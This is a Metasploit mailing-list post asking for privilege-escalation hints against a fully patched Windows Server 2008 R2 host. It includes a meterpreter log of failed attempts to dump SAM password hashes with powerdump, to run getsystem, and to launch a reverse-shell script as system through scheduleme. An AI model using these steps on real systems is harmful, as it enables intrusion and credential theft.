Powerdump / getsystem / privilege escalation on Windows 2008 R2

[wfdawson <wfdawson () bellsouth net>]

Any hints on privilege escalation in Windows 2008 R2 fully patched as of today?


Target is Windows Server 2008 R2.

meterpreter > run powerdump
[*] PowerDump v0.1 - PowerDump to extract Username and Password Hashes...
[*] Running PowerDump to extract Username and Password Hashes...
[*] Uploaded PowerDump as 57501.ps1 to %TEMP%...
[*] Setting ExecutionPolicy to Unrestricted...
[*] Dumping the SAM database through PowerShell...
[-] Error in script: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: The system cannot find 
the file specified.

Getsystem fails, also.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.

I suppose I simply do not have sufficient privilege for either...

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeChangeNotifyPrivilege

My attempt to set the powershell script restriction policy manually reflects that:

PS C:\> Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy : Access to the registry key 
'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell' is denied.
At line:1 char:20
+ Set-ExecutionPolicy <<<<  Unrestricted
    + CategoryInfo          : NotSpecified: (:) [Set-ExecutionPolicy], UnauthorizedAccessException
    + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.SetExecutionPolicyCommand

meterpreter > run scheduleme -c "C:\\User\\Metasploit\\revshell.vbs" -i -u system
[*] Meterpreter is not running under sufficient administrative rights.


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework